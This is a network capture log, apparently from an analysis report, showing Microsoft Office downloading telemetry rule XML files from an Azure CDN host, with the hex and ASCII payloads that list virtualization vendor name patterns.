2024-11-11 00:15:06 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:06 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 2f2a95d3-901e-00ac-5b08-2cb69e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001506Z-16547b76f7f9bs6dhC1DFWt3rg0000000ddg000000003dtv x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:06 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	49830	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:06 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:07 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:06 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: ea775dbe-901e-0016-4f03-2defe9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001506Z-16547b76f7fxdzxghC1DFWmf7n0000000dh0000000005hua x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:07 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	49829	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:06 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:07 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:07 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 4877456d-c01e-008e-704f-317381000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001507Z-17df447cdb5qt2nfhC1DFWzhgw00000006w000000000gsnf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:07 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	49831	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:07 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:07 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:07 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 86fb44b9-501e-0078-06d2-2c06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001507Z-16547b76f7f22sh5hC1DFWyb4w0000000db0000000005p3g x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:07 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	49832	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:07 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:07 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:07 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 392771d5-701e-000d-1cd2-2c6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001507Z-16547b76f7fdtmzhhC1DFW6zhc00000002b00000000020dx x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:07 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	49833	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:07 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:07 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:07 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: d4913e6b-901e-0029-0593-31274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001507Z-17df447cdb5bz95mhC1DFWnk7w00000009m00000000068at x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:07 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	49834	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:07 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:07 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:07 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 12076dc0-c01e-000b-5108-32e255000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001507Z-15869dbbcc6xpvqthC1DFWq7d800000006ug00000000c6um x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:07 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	49835	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:07 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:08 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:08 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 0442bbce-301e-000c-55cc-32323f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001508Z-15869dbbcc6zbpm7hC1DFW75xg00000006r0000000006ahm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:08 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	49836	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:08 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:08 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:08 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 9ad52bc4-d01e-005a-6aef-2f7fd9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001508Z-17df447cdb5fzdpxhC1DFWdd3400000009ug00000000cyep x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:08 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	49839	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:08 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:08 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:08 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 45e5fca7-101e-0028-4438-338f64000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001508Z-15869dbbcc6x4rp4hC1DFW3t7w0000000fr00000000069rk x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-11 00:15:08 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	49840	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:08 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:08 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:08 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 229e582e-901e-0083-26d2-2cbb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001508Z-16547b76f7f7scqbhC1DFW0m5w0000000d4g00000000kypx x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:08 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.4	49841	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:08 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:08 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:08 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: c3d6966f-401e-0016-3ad8-2b53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001508Z-16547b76f7fx6rhxhC1DFW76kg0000000d9g00000000g3ts x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:08 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49842	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
